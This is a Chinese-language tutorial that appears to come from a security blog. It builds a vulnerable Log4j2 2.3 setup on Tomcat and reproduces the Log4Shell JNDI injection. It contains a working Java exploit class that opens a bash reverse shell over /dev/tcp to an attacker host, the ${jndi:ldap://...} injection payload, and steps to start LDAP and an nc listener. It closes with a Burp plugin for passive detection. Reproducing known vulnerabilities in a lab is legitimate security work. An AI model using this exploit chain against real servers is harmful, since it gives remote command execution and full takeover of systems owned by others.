Log4j2漏洞环境搭建及复现

(Updated: )
漏洞复现
, ,

image-20220901140741054

0x00前言

1、漏洞影响版本

1
Log4j2.x<=2.14.1

0x02 所需环境

1、tomcat版本8.0.51

1
https://archive.apache.org/dist/tomcat/tomcat-8/

2、tomcat日志扩展接口包

1
2
tomcat-juli.jar
tomcat-juli-adapters.jar
1
2
# 下载地址
http://archive.apache.org/dist/tomcat/tomcat-8/v8.0.51/bin/extras/

3、log4j2版本2.3

1
2
3
log4j-core-2.3.jar
log4j-api-2.3.jar
log4j-1.2-api-2.3.jar
1
2
# 下载地址
https://archive.apache.org/dist/logging/log4j/2.3/

0x03 环境搭建

tomcat环境搭建

见站内Fastjson-1.2.47漏洞环境搭建及漏洞复现文字,搭建步骤相同

log4j2环境引用

1、新建Log4j2配置文件,更换tomcat默认输出组件为debug,确保参数无差别触发

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?xml version="1.0" encoding="utf-8"?>
<Configuration status="debug">
    <Properties>
        <Property name="logdir">${sys:catalina.base}/logs</Property>
        <Property name="layout">%d [%t] %-5p %c-%m%n</Property>
    </Properties>
    <Appenders>
        <Console name="CONSOLE" target="SYSTEM_OUT">
            <PatternLayout charset="UTF-8" pattern="${layout}" />
        </Console>
        <RollingFile name="CATALINA" fileName="${logdir}/catalina.log"
            filePattern="${logdir}/catalina.%d{yyyy-MM-dd}.log.gz">
            <PatternLayout charset="UTF-8" pattern="${layout}" />
            <!-- DefaultRolloverStrategy属性如不设置,则默认为最多同一文件夹下7个文件,这里设置了20 -->
            <SizeBasedTriggeringPolicy size="50MB" />
            <DefaultRolloverStrategy max="20" />
        </RollingFile>
        <RollingFile name="LOCALHOST" fileName="${logdir}/localhost.log"
            filePattern="${logdir}/localhost.%d{yyyy-MM-dd}-%i.log.gz">
            <PatternLayout charset="UTF-8" pattern="${layout}" />
            <SizeBasedTriggeringPolicy size="50MB" />
            <DefaultRolloverStrategy max="20" />
        </RollingFile>
    </Appenders>
    <Loggers>
        <Logger
            name="org.apache.catalina.core.ContainerBase.[Catalina].[localhost]"
            level="info">
            <AppenderRef ref="LOCALHOST" />
        </Logger>
        <Root level="debug">
            <AppenderRef ref="CATALINA" />
            <AppenderRef ref="CONSOLE" />
        </Root>
    </Loggers>
</Configuration>

2、log4j2组件引用

1
2
3
[+] 将3个 log4j2 jar包 和 tomcat-juli-adapters.jar放到 tomact 目录下的lib文件夹下
[+] tomcat-juli.jar 替换tomcat目录下 bin 文件夹下的同名文件
[+] 删除tomact目录下conf文件夹下的logging.properties文件,并将新建的log4j2.xml,放到tomcat目录下lib文件夹下

3、启动环境

0x05 漏洞复现

2、手动复现

1
http://x.x.x.x:8080/examples/servlets/servlet/RequestParamExample

image-20220901133439529

image-20220901133243059

image-20220901133342785

反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
public class Exploit {
   public Exploit(){
       try{
           // 要执行的命令
           String[] commands = {"bash","-c","exec 5<>/dev/tcp/x.x.x.x/2333;cat <&5 | while read line; do $line 2>&5 >&5; done"};
           Process pc = Runtime.getRuntime().exec(commands);
           pc.waitFor();
      } catch(Exception e){
           e.printStackTrace();
      }
  }

   public static void main(String[] argv) {
       Exploit e = new Exploit();
  }
}

启动恶意类

image-20220901135410419

开启LDAP服务

image-20220901140229204

开启nc监听

image-20220901140258163

burp放包,执行命令反弹shell

1
${jndi:ldap://x.x.x.x:1234/Exploit}

image-20220901135944613

获取shell

image-20220901140041503

1、Burp插件被动扫描

1
https://f0ng.github.io/2021/12/22/log4j2burpscanner/

配置自己的ceye.io

image-20220901181915587

image-20220901181949766

随后开启Burp,网站点点点,进行被动扫描

image-20220901161415792

ceye.io接收到请求

image-20220901161537040

参考文章

1
2
https://mp.weixin.qq.com/s/A0CnPqZO3cP3gWpItxvIbA
https://blog.csdn.net/tutian2000/article/details/81903924